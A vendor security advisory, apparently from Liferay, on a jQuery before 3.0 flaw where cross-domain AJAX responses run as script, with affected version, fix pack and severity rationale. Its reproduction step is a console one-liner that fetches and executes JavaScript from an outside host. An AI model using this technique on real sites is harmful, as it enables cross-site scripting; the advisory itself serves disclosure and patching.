This article documents a security issue in jQuery versions prior to 3.0, which is also described on Github.
The issue can be reproduced with the following steps.
- Install a theme that uses jQuery prior to 3.0.
- Head to any page with that theme.
- Open the developer console.
- Type in
jQuery.get('https://sakurity.com/jqueryxss').then(console.log.bind(console));
Result: The page executes the Javascript even though we only wanted jQuery to retrieve the text. A popup appears with localhost as content.
Affected Product/s
Liferay DXP 7.0 (DE 7.0)
Resolution
Fixed by DXP 7.0 Fix Pack 28. (LPE-16368)
Liferay Security Vulnerability Information
This issue does not have a Liferay Security Vulnerability (LSV) severity attached as it does not fulfill the requirements of Liferay's Security Policy to be considered as a Liferay product vulnerability because no out-of-the-box component in DXP 7.0 makes AJAX calls to untrusted third-party site. Thus the only way to exploit it requires to deploy custom code which falls under the developer team's realm.
Additional Information
The Liferay platform uses jQuery 2.1.4 in DXP 7.0, and plans to upgrade to jQuery version 3.2.1 or above in future versions of the Liferay product.